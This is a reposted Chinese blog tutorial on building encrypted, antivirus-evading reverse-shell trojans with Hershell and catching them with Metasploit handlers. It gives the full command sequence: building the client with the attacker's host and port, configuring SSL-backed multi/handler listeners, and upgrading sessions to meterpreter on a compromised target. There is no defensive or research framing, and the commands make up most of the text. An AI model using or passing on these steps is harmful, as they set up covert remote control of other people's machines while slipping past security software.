首页 > 系统相关 >Hershell反向shell生成器+msf加密通信免杀

Hershell反向shell生成器+msf加密通信免杀

时间:2024-06-06 17:35:02浏览次数:28  
标签:set 免杀 com 生成器 shell hershell meterpreter 服务端

转自:https://www.cnblogs.com/Chuantouli/p/12298579.html

简介 Hershell

1 Hershell(<a href="github.com/sysdream/hershell" target="_blank" rel="noopener">github.com/sysdream/hershell</a>)是基于golang开发的一款反向shell生成器,跨平台、流量加密、免杀效果较好  

环境配置

  安装golang,go get下载源码,切换到其目录

1 <em id="__mceDel">yum install golang<br>cd $HOME/go<br>go get github.com/sysdream/hershell<br>cd /root/go/src/github.com/sysdream/hershell</em>

使用操作

1、生成证书

1 make depends

2、生成客户端,运行后会生成hershell.exe,针对其不同平台使用不同方法的生成,修改其参数即可

1 make windows32 LHOST=服务端IP LPORT=监听端口

3、直接使用msf进行反连

1 use exploit/multi/handler<br>set payload python/shell_reverse_tcp_ssl<br>set lhost 服务端IP<br>set lport 服务端端口<br>set HandlerSSLCert ./server.pem<br>exploit -j

4、靶机运行客户端木马,成功上线

 

 

 5、hershell的shell自带没有很多功能,最好还是切换到强大的后渗透模块meterpreter,这里本来想使用session -u直接升级会话的,奈何没升级成功

 

 

 

6、另开一个会话启动msf监听

1 2 3 4 5 6 use exploit/multi/handler set payload windows/meterpreter/reverse_https set lhost 服务端ip set lport 服务端端口 set HandlerSSLCert ./server.pem exploit -j

7、hershell使用内置的meterpreter模块迁移,直接退出了会话,这里没明白为什么,和上面session转会话一样,感觉有点玄学,总之,这两种两种都可以来变成meterpreter会话

1 meterpreter https 服务端ip:服务端端口

标签:set,免杀,com,生成器,shell,hershell,meterpreter,服务端
From: https://www.cnblogs.com/gongzb/p/18235685

相关文章

  • shell脚本之证书到期监控和企微告警
    shell脚本之证书到期监控和企微告警shell脚本实现ssl证书过期及webhook推送脚本https.sh检测和告警脚本, https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key=xxxxxxxxxxxxx替换为自己企微的webhook地址即可#!/bin/bash#*******************************************......
  • [GDOUCTF 2023] Shellcode
    [GDOUCTF2023]Shellcoderet2shellcode|shellcodeint__fastcallmain(intargc,constchar**argv,constchar**envp){charbuf[10];//[rsp+6h][rbp-Ah]BYREFsetbuf(stdin,0LL);setbuf(stderr,0LL);setbuf(stdout,0LL);mprotect((&stdout......
  • MySQL Shell 使用指南
    前言:MySQLShell是官方提供的MySQL周边适配组件,是新一代的高级客户端,在MySQL8.0及其以后的版本得以慢慢推广应用。之前笔者因为MySQL8.0用得比较少,一直没有详细使用过这个工具,近期在捣鼓MySQL8.0,趁此机会,一起来学习下吧。1.MySQLShell介绍与安装使用MySQLShell......
  • 可迭代对象-迭代器-生成器
    可迭代对象能被for循环遍历的元素lists=[1,2,3,4]foriinlists:print(i)生成器是一种特殊的变量斐波那契数列生成器defget_data(num):x=0y=1foriinrange(num):x,y=y,x+yyieldx#返回的是一个yield生成器迭代器能被next函数调用并不断返回下一个值的......
  • 在 Powershell 管道中创建新对象
    我希望将某些文件递归复制到目标目录,但保持相同的文件夹结构。我希望能够执行以下操作:gci-Recurse-File*.csproj|rvpa-Relative|select{@{src=$_;dst=[System.IO.Path]::GetDirectoryName($baseDir+$_)}}}|%{mkdir$_.dst&&cp$_.src$_.dst}......
  • MySQL Shell 的简单使用
    util.dumpTables():导出表util.dumpSchemas():导出单个或多个schemautil.dumpInstance():导出整个实例 util.dumpTables()的使用语法:util.dumpTables(schema,tables,outputUrl[,options])其中:·schema:是表所在的schema·tables:是一个数组,表示要导出的表的列表·outp......
  • Xshell或其他命令行终端中,提示符(prompt)中的主机名太长,影响视觉体验或阅读方便性
    如果在Xshell或其他命令行终端中,你发现提示符(prompt)中的主机名太长,影响视觉体验或阅读方便性,你可以通过修改Linux系统的配置来缩短或美化这个提示符。这里有两种方法来解决这个问题:###1.暂时修改提示符你可以在当前终端会话中临时改变提示符,这不会影响其他用户或重启后的设置。......
  • CodeWars Shell Question
    CodeWarsShellQuestionClock#https://www.codewars.com/kata/55f9bca8ecaa9eac7100004ah=$1m=$2s=$3echo"(($h*60+$m)*60+$s)*1000"|bcEvenOrOdd#https://www.codewars.com/kata/53da3dbb4a5168369a0000feEvenOrOdd(){if(($1%2==0));then......
  • sockos1.1-shellshock
    主机发现和nmap扫描nmap-sn192.68.56.0/24靶机ip:192.168.56.105nmap-sT--min-rate10000192.168.56.105PORTSTATESERVICE22/tcpopenssh3128/tcpopensquid-http8080/tcpclosedhttp-proxynmap-sT-sV-sC-O-p22,3128,8080192.168.56.105PO......
  • 使用powershell脚本,自动压缩文件夹,实现备份功能
    担心数据丢失?教你3分钟实现自动压缩,备份文件夹。最近在使用obsidian,想要在多台电脑上访问一个同一个仓库,所以我把obsidian-vault设置在了mac-mini的共享文件夹上。但是有一个问题,mac-mini上边的硬盘是我的闲置硬盘,随时都可能挂掉。一、通过脚本自动备份为了避免obsidian......